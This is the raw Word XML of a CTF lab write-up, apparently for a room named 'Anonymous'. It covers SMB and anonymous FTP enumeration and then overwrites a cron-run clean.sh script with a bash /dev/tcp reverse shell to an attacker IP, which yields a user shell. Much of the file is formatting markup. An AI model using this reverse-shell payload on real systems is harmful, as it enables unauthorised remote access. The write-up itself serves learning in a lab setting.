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35623" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000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Anonymous_Solution_Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C2FBD" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000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t>Written By: Yuval Quina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A305A3F" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00656EAD"/>
    <w:p w14:paraId="5C031500" w14:textId="77777777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t>I started this challenge by performing a Nmap scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D499356" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="13EED98B" wp14:editId="4D1C6E81">
            <wp:extent cx="4902200" cy="53149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02200" cy="531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6517E" w14:textId="77777777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t>While examining the scan results, I noticed the open SMB ports of 139 and 445. This led me to enumerate the shares of the target’s machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990FD02" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="56C82FDE" wp14:editId="58E12BCB">
            <wp:extent cx="5313045" cy="2348865"/>
            <wp:effectExtent l="0" t="0" r="8255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13045" cy="2348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46EBFA" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t>Here I found the “pics” share (which seems to be quite unusual shared folder).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD79CC7" w14:textId="77777777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t>Then, I successfully logged-in to the FTP service using the username “anonymous” with no password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A658A8" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5159E3E9" wp14:editId="00894155">
            <wp:extent cx="1987550" cy="1187450"/>
            <wp:effectExtent l="0" t="0" r="635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87550" cy="118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4011D" w14:textId="77777777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t>After getting connected, I listed all the available files and folders:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CBBECE" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2C9C0BA2" wp14:editId="797710B4">
            <wp:extent cx="3352800" cy="539750"/>
            <wp:effectExtent l="0" t="0" r="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B5B0" w14:textId="77777777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t>And I noticed the folder “scripts” which contain these files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3DD40A" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="67C8C056" wp14:editId="1B879DE7">
            <wp:extent cx="3816350" cy="1073150"/>
            <wp:effectExtent l="0" t="0" r="635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16350" cy="107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C58D3" w14:textId="77777777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t>I downloaded them to my own machine and I opened each one:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE884A6" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3CC167A8" wp14:editId="62B26F79">
            <wp:extent cx="5271770" cy="2565400"/>
            <wp:effectExtent l="0" t="0" r="1143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56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35A0A7" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="0000000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to_do.txt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60612A64" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="726B4DD2" wp14:editId="19955B77">
            <wp:extent cx="3530600" cy="425450"/>
            <wp:effectExtent l="0" t="0" r="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0600" cy="425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424C2" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="0000000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clean.sh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5622E591" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="11E2A68C" wp14:editId="3F1BF2D2">
            <wp:extent cx="5225415" cy="1298575"/>
            <wp:effectExtent l="0" t="0" r="698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25415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DC345" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00656EAD"/>
    <w:p w14:paraId="57C8EE81" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:pPr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lastRenderedPageBreak/>
        <w:t>Removed_files.log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5272ACCB" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00656EAD"/>
    <w:p w14:paraId="145BD119" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2E3F3157" wp14:editId="4954A248">
            <wp:extent cx="2286000" cy="170180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716E65" w14:textId="77777777" w:rsidR="00656EAD" w:rsidRDefault="00656EAD"/>
    <w:p w14:paraId="17A4E904" w14:textId="77777777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t>I read the files’ content and understood that the clean.sh script suppose to clean up tmp files from the “/tmp” folder, but it won’t do so, because its value of “tmp_files” never changing from its initial value (0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F491F" w14:textId="77777777" w:rsidR="00E0244F" w:rsidRDefault="00E0244F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8C0D81" w14:textId="4D96A9A6" w:rsidR="00656EAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">At this point, </w:t>
      </w:r>
      <w:r w:rsidR="007C5FD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I chose to execute a reverse shell attack by changing the clean.sh file to execute this command</w:t>
      </w:r>
      <w:r w:rsidR="00483CA8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FEF73F" w14:textId="56736E4D" w:rsidR="00483CA8" w:rsidRDefault="00483CA8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483CA8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sh -i &gt;&amp; /dev/tcp/10.9.1.122/4444 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9C02F" w14:textId="77777777" w:rsidR="00483CA8" w:rsidRDefault="00483CA8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E32CD9D" w14:textId="1442AD8A" w:rsidR="007C5FD5" w:rsidRDefault="00483CA8" w:rsidP="00483CA8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">*Note that I first of all downloaded the clean.sh, then edited it and uploaded it back to the </w:t>
      </w:r>
      <w:r w:rsidR="005410E1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ftp server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B3F6B2" w14:textId="2841449E" w:rsidR="005410E1" w:rsidRDefault="00F4647F" w:rsidP="00483CA8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4647F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AF22C53" wp14:editId="679B5E91">
            <wp:extent cx="4038950" cy="769687"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5530819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0819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38950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577AF" w14:textId="24658DCE" w:rsidR="0060207F" w:rsidRDefault="0060207F" w:rsidP="0060207F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>And before uploading the file I created this netcat listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167CDFF" w14:textId="3DEAB620" w:rsidR="0060207F" w:rsidRDefault="00C67E30" w:rsidP="0060207F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67E30">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7059BED1" wp14:editId="3DFA45EC">
            <wp:extent cx="3436918" cy="769687"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35648068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806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769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C985B" w14:textId="4EFAFCCD" w:rsidR="00C67E30" w:rsidRDefault="00C67E30" w:rsidP="0060207F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">And after couple of </w:t>
      </w:r>
      <w:r w:rsidR="00507F31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seconds,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I got a shell</w:t>
      </w:r>
      <w:r w:rsidR="00E44EF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00305261">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">over the target machine </w:t>
      </w:r>
      <w:r w:rsidR="00E44EF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(the clean.sh file</w:t>
      </w:r>
      <w:r w:rsidR="00305261">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> probably</w:t>
      </w:r>
      <w:r w:rsidR="00E44EF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00305261">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00E44EF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00305261">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00E44EF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00E01234">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> each time</w:t>
      </w:r>
      <w:r w:rsidR="00E44EF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B02E3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve">for a </w:t>
      </w:r>
      <w:r w:rsidR="00305261" w:rsidRPr="00305261">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>certain amount of tim</w:t>
      </w:r>
      <w:r w:rsidR="00E01234">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00E44EF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00DD016B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE3255D" w14:textId="1C2184B4" w:rsidR="00F356C7" w:rsidRDefault="00F356C7" w:rsidP="0060207F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>And there I found the user.txt file</w:t>
      </w:r>
      <w:r w:rsidR="00A4321F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> its flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02216C1E" w14:textId="64D505D6" w:rsidR="00F356C7" w:rsidRDefault="00F356C7" w:rsidP="0060207F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F356C7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B4DD78E" wp14:editId="5453433E">
            <wp:extent cx="1867062" cy="743014"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1877876094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7609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867062" cy="7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F4F96" w14:textId="77777777" w:rsidR="00C67E30" w:rsidRPr="00483CA8" w:rsidRDefault="00C67E30" w:rsidP="0060207F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C67E30" w:rsidRPr="00483CA8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0B5C5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="162295D0"/>
    <w:lvl w:ilvl="0" w:tplc="307E9E0E"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6288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0B5D44"/>
    <w:rsid w:val="000B02E3"/>
    <w:rsid w:val="000E3899"/>
    <w:rsid w:val="001949F8"/>
    <w:rsid w:val="00305261"/>
    <w:rsid w:val="0033301A"/>
    <w:rsid w:val="00476C14"/>
    <w:rsid w:val="00483CA8"/>
    <w:rsid w:val="00507F31"/>
    <w:rsid w:val="005410E1"/>
    <w:rsid w:val="005903A4"/>
    <w:rsid w:val="0060207F"/>
    <w:rsid w:val="006070A3"/>
    <w:rsid w:val="00656EAD"/>
    <w:rsid w:val="006E6AC6"/>
    <w:rsid w:val="00782B7C"/>
    <w:rsid w:val="007C5FD5"/>
    <w:rsid w:val="00831571"/>
    <w:rsid w:val="009D4626"/>
    <w:rsid w:val="00A4321F"/>
    <w:rsid w:val="00AA1029"/>
    <w:rsid w:val="00B768BC"/>
    <w:rsid w:val="00C67E30"/>
    <w:rsid w:val="00CB7ADB"/>
    <w:rsid w:val="00D958F2"/>
    <w:rsid w:val="00DD016B"/>
    <w:rsid w:val="00E01234"/>
    <w:rsid w:val="00E0244F"/>
    <w:rsid w:val="00E44EF3"/>
    <w:rsid w:val="00EB5E12"/>
    <w:rsid w:val="00ED410B"/>
    <w:rsid w:val="00F318F4"/>
    <w:rsid w:val="00F356C7"/>
    <w:rsid w:val="00F4647F"/>
    <w:rsid w:val="00F46721"/>
    <w:rsid w:val="011E3CE2"/>
    <w:rsid w:val="01B93EE0"/>
    <w:rsid w:val="01EC5634"/>
    <w:rsid w:val="01F0403A"/>
    <w:rsid w:val="02040ADD"/>
    <w:rsid w:val="025C49EE"/>
    <w:rsid w:val="02BE10CC"/>
    <w:rsid w:val="0314312F"/>
    <w:rsid w:val="03521A83"/>
    <w:rsid w:val="03633F1C"/>
    <w:rsid w:val="03660724"/>
    <w:rsid w:val="0393501D"/>
    <w:rsid w:val="03E2226C"/>
    <w:rsid w:val="0466502E"/>
    <w:rsid w:val="04E463BC"/>
    <w:rsid w:val="055F2A5D"/>
    <w:rsid w:val="060B0977"/>
    <w:rsid w:val="071F2612"/>
    <w:rsid w:val="07AC00A3"/>
    <w:rsid w:val="07F910B5"/>
    <w:rsid w:val="08337083"/>
    <w:rsid w:val="08433A9A"/>
    <w:rsid w:val="08B73A59"/>
    <w:rsid w:val="08C330EF"/>
    <w:rsid w:val="08FF54D2"/>
    <w:rsid w:val="09292BDA"/>
    <w:rsid w:val="095B7DEA"/>
    <w:rsid w:val="09E7414B"/>
    <w:rsid w:val="09E81BCC"/>
    <w:rsid w:val="0A295EB9"/>
    <w:rsid w:val="0A7D5943"/>
    <w:rsid w:val="0B4D2798"/>
    <w:rsid w:val="0BF6772E"/>
    <w:rsid w:val="0C2A4705"/>
    <w:rsid w:val="0C9275AC"/>
    <w:rsid w:val="0CE360B2"/>
    <w:rsid w:val="0CEC47C3"/>
    <w:rsid w:val="0D11117F"/>
    <w:rsid w:val="0D413ECD"/>
    <w:rsid w:val="0D5A4DF7"/>
    <w:rsid w:val="0E3F636E"/>
    <w:rsid w:val="0E5F68A3"/>
    <w:rsid w:val="0EB25028"/>
    <w:rsid w:val="0EB32AAA"/>
    <w:rsid w:val="0F2478E6"/>
    <w:rsid w:val="0F7066E0"/>
    <w:rsid w:val="0F7F0EF9"/>
    <w:rsid w:val="0F89508C"/>
    <w:rsid w:val="10466E61"/>
    <w:rsid w:val="10480942"/>
    <w:rsid w:val="106D2640"/>
    <w:rsid w:val="10950A41"/>
    <w:rsid w:val="119C37F2"/>
    <w:rsid w:val="125E1331"/>
    <w:rsid w:val="12B409FA"/>
    <w:rsid w:val="12B75243"/>
    <w:rsid w:val="12B82CC5"/>
    <w:rsid w:val="12C61FDA"/>
    <w:rsid w:val="130030B9"/>
    <w:rsid w:val="13141D5A"/>
    <w:rsid w:val="131C29E9"/>
    <w:rsid w:val="1344612C"/>
    <w:rsid w:val="138F3C22"/>
    <w:rsid w:val="13B44A8A"/>
    <w:rsid w:val="145E0C1D"/>
    <w:rsid w:val="148854BE"/>
    <w:rsid w:val="15B50867"/>
    <w:rsid w:val="163C2586"/>
    <w:rsid w:val="167C0DF1"/>
    <w:rsid w:val="16CA6972"/>
    <w:rsid w:val="16FF5B47"/>
    <w:rsid w:val="170C73DC"/>
    <w:rsid w:val="171B1BF4"/>
    <w:rsid w:val="176C3F7D"/>
    <w:rsid w:val="17B752F6"/>
    <w:rsid w:val="180A72FE"/>
    <w:rsid w:val="18F44CFE"/>
    <w:rsid w:val="1A422421"/>
    <w:rsid w:val="1ABB4669"/>
    <w:rsid w:val="1BE52E52"/>
    <w:rsid w:val="1D4E2424"/>
    <w:rsid w:val="1D517B25"/>
    <w:rsid w:val="1E192DF2"/>
    <w:rsid w:val="1E543ED0"/>
    <w:rsid w:val="1E5673D3"/>
    <w:rsid w:val="1E6E4A7A"/>
    <w:rsid w:val="1EBE5AFE"/>
    <w:rsid w:val="1ED66A28"/>
    <w:rsid w:val="1EDD63B3"/>
    <w:rsid w:val="1F723023"/>
    <w:rsid w:val="1FB11C0E"/>
    <w:rsid w:val="1FEA526B"/>
    <w:rsid w:val="2027184D"/>
    <w:rsid w:val="20446BFF"/>
    <w:rsid w:val="217472F0"/>
    <w:rsid w:val="227F6529"/>
    <w:rsid w:val="22E152C9"/>
    <w:rsid w:val="23EB31FD"/>
    <w:rsid w:val="24117BB9"/>
    <w:rsid w:val="24805C6F"/>
    <w:rsid w:val="24924C8F"/>
    <w:rsid w:val="24F737AC"/>
    <w:rsid w:val="25AE66E1"/>
    <w:rsid w:val="25E27C61"/>
    <w:rsid w:val="25E642BC"/>
    <w:rsid w:val="263317DE"/>
    <w:rsid w:val="263F01CE"/>
    <w:rsid w:val="264B1A62"/>
    <w:rsid w:val="26A420F1"/>
    <w:rsid w:val="26F81B7B"/>
    <w:rsid w:val="276A6636"/>
    <w:rsid w:val="278C7E70"/>
    <w:rsid w:val="278D58F1"/>
    <w:rsid w:val="27D553DD"/>
    <w:rsid w:val="28030DB3"/>
    <w:rsid w:val="281A7247"/>
    <w:rsid w:val="282A6A75"/>
    <w:rsid w:val="287610F2"/>
    <w:rsid w:val="28792077"/>
    <w:rsid w:val="2892519F"/>
    <w:rsid w:val="29274B33"/>
    <w:rsid w:val="29C273E5"/>
    <w:rsid w:val="2A2655B6"/>
    <w:rsid w:val="2A4D5475"/>
    <w:rsid w:val="2AAE0992"/>
    <w:rsid w:val="2B136138"/>
    <w:rsid w:val="2BAE6336"/>
    <w:rsid w:val="2BE55328"/>
    <w:rsid w:val="2C542347"/>
    <w:rsid w:val="2C9762B4"/>
    <w:rsid w:val="2CDB6437"/>
    <w:rsid w:val="2CED1241"/>
    <w:rsid w:val="2DDE1E4E"/>
    <w:rsid w:val="2DEB1164"/>
    <w:rsid w:val="2E285745"/>
    <w:rsid w:val="2F0245FB"/>
    <w:rsid w:val="30313232"/>
    <w:rsid w:val="30EF04D7"/>
    <w:rsid w:val="31144E94"/>
    <w:rsid w:val="31416C5C"/>
    <w:rsid w:val="320D2EAD"/>
    <w:rsid w:val="326203B9"/>
    <w:rsid w:val="32DD447F"/>
    <w:rsid w:val="32EB4A9A"/>
    <w:rsid w:val="334D5A38"/>
    <w:rsid w:val="33A92EB8"/>
    <w:rsid w:val="33B02259"/>
    <w:rsid w:val="33C643FD"/>
    <w:rsid w:val="341C5D39"/>
    <w:rsid w:val="343659B5"/>
    <w:rsid w:val="34496D9C"/>
    <w:rsid w:val="34907349"/>
    <w:rsid w:val="34F85A73"/>
    <w:rsid w:val="35187948"/>
    <w:rsid w:val="351B5D26"/>
    <w:rsid w:val="352C11B2"/>
    <w:rsid w:val="35894B92"/>
    <w:rsid w:val="359F479A"/>
    <w:rsid w:val="35A70196"/>
    <w:rsid w:val="35C43EC2"/>
    <w:rsid w:val="36A622B7"/>
    <w:rsid w:val="370B5D44"/>
    <w:rsid w:val="370B7A5D"/>
    <w:rsid w:val="379F24CF"/>
    <w:rsid w:val="37C4140A"/>
    <w:rsid w:val="37C6490D"/>
    <w:rsid w:val="37FF7C7D"/>
    <w:rsid w:val="38225026"/>
    <w:rsid w:val="382D0E39"/>
    <w:rsid w:val="3860038E"/>
    <w:rsid w:val="389B146D"/>
    <w:rsid w:val="38B13611"/>
    <w:rsid w:val="390D04A7"/>
    <w:rsid w:val="397A6819"/>
    <w:rsid w:val="39987E7E"/>
    <w:rsid w:val="3AE80CB2"/>
    <w:rsid w:val="3B387B37"/>
    <w:rsid w:val="3B47390A"/>
    <w:rsid w:val="3B59226A"/>
    <w:rsid w:val="3B8B1B40"/>
    <w:rsid w:val="3BCB4B28"/>
    <w:rsid w:val="3CAD2B7D"/>
    <w:rsid w:val="3CD278D9"/>
    <w:rsid w:val="3D6C4254"/>
    <w:rsid w:val="3D9B1520"/>
    <w:rsid w:val="3E006CC6"/>
    <w:rsid w:val="3E0334CE"/>
    <w:rsid w:val="3E4464B5"/>
    <w:rsid w:val="3E895925"/>
    <w:rsid w:val="3E9A1443"/>
    <w:rsid w:val="3F0C1354"/>
    <w:rsid w:val="3F63690D"/>
    <w:rsid w:val="3F690816"/>
    <w:rsid w:val="3FB41B8F"/>
    <w:rsid w:val="3FB776F5"/>
    <w:rsid w:val="3FBD249F"/>
    <w:rsid w:val="403A30ED"/>
    <w:rsid w:val="40631D33"/>
    <w:rsid w:val="40662CB8"/>
    <w:rsid w:val="41837C0C"/>
    <w:rsid w:val="41EB2AB3"/>
    <w:rsid w:val="41EC0535"/>
    <w:rsid w:val="42014C57"/>
    <w:rsid w:val="421019EE"/>
    <w:rsid w:val="423676B0"/>
    <w:rsid w:val="42AE05F3"/>
    <w:rsid w:val="431C0C27"/>
    <w:rsid w:val="43BA1A2A"/>
    <w:rsid w:val="43BA782C"/>
    <w:rsid w:val="43C610C0"/>
    <w:rsid w:val="44253167"/>
    <w:rsid w:val="44531FA9"/>
    <w:rsid w:val="4522137C"/>
    <w:rsid w:val="45585FD3"/>
    <w:rsid w:val="469B78E4"/>
    <w:rsid w:val="46C9712E"/>
    <w:rsid w:val="46D73EC6"/>
    <w:rsid w:val="47997807"/>
    <w:rsid w:val="48B721DD"/>
    <w:rsid w:val="49AC5F6D"/>
    <w:rsid w:val="49AD1724"/>
    <w:rsid w:val="49B45578"/>
    <w:rsid w:val="4A1B1AA4"/>
    <w:rsid w:val="4A1C3CA2"/>
    <w:rsid w:val="4A521F7E"/>
    <w:rsid w:val="4A760EB9"/>
    <w:rsid w:val="4B46248B"/>
    <w:rsid w:val="4B493410"/>
    <w:rsid w:val="4B50081C"/>
    <w:rsid w:val="4B904E89"/>
    <w:rsid w:val="4BBD5166"/>
    <w:rsid w:val="4BFD41B8"/>
    <w:rsid w:val="4CBE340E"/>
    <w:rsid w:val="4D2D012D"/>
    <w:rsid w:val="4D310D32"/>
    <w:rsid w:val="4D3E25C6"/>
    <w:rsid w:val="4DA41071"/>
    <w:rsid w:val="4DDB3749"/>
    <w:rsid w:val="4DE230D4"/>
    <w:rsid w:val="4E3166D6"/>
    <w:rsid w:val="4E940979"/>
    <w:rsid w:val="4ED97DE9"/>
    <w:rsid w:val="4F102BE2"/>
    <w:rsid w:val="4F7F767D"/>
    <w:rsid w:val="4FC3106B"/>
    <w:rsid w:val="501C16FA"/>
    <w:rsid w:val="501D29FE"/>
    <w:rsid w:val="50501F54"/>
    <w:rsid w:val="50DE503B"/>
    <w:rsid w:val="51253231"/>
    <w:rsid w:val="5140185C"/>
    <w:rsid w:val="51555F7E"/>
    <w:rsid w:val="521572B6"/>
    <w:rsid w:val="525748A7"/>
    <w:rsid w:val="532277F3"/>
    <w:rsid w:val="53336043"/>
    <w:rsid w:val="53BC2CEE"/>
    <w:rsid w:val="53CE790C"/>
    <w:rsid w:val="53D7279A"/>
    <w:rsid w:val="54797DA5"/>
    <w:rsid w:val="54A30979"/>
    <w:rsid w:val="552349BA"/>
    <w:rsid w:val="5524243C"/>
    <w:rsid w:val="55656729"/>
    <w:rsid w:val="55A92695"/>
    <w:rsid w:val="574A5644"/>
    <w:rsid w:val="57E72F44"/>
    <w:rsid w:val="58294CB2"/>
    <w:rsid w:val="59854011"/>
    <w:rsid w:val="59946483"/>
    <w:rsid w:val="5AA83DCD"/>
    <w:rsid w:val="5B9836D5"/>
    <w:rsid w:val="5BA800EC"/>
    <w:rsid w:val="5BBA168B"/>
    <w:rsid w:val="5BBC4B8E"/>
    <w:rsid w:val="5BF117E5"/>
    <w:rsid w:val="5C017881"/>
    <w:rsid w:val="5C114298"/>
    <w:rsid w:val="5C494506"/>
    <w:rsid w:val="5C4C7FF5"/>
    <w:rsid w:val="5C59248E"/>
    <w:rsid w:val="5CD24B4A"/>
    <w:rsid w:val="5D1C12D3"/>
    <w:rsid w:val="5DBB20D6"/>
    <w:rsid w:val="5DCB48EE"/>
    <w:rsid w:val="5E3E4C2D"/>
    <w:rsid w:val="5F7E303B"/>
    <w:rsid w:val="5FD03D3F"/>
    <w:rsid w:val="5FD42745"/>
    <w:rsid w:val="602219D3"/>
    <w:rsid w:val="60605BAC"/>
    <w:rsid w:val="6091637B"/>
    <w:rsid w:val="60BA2331"/>
    <w:rsid w:val="60DD09F9"/>
    <w:rsid w:val="613C0A12"/>
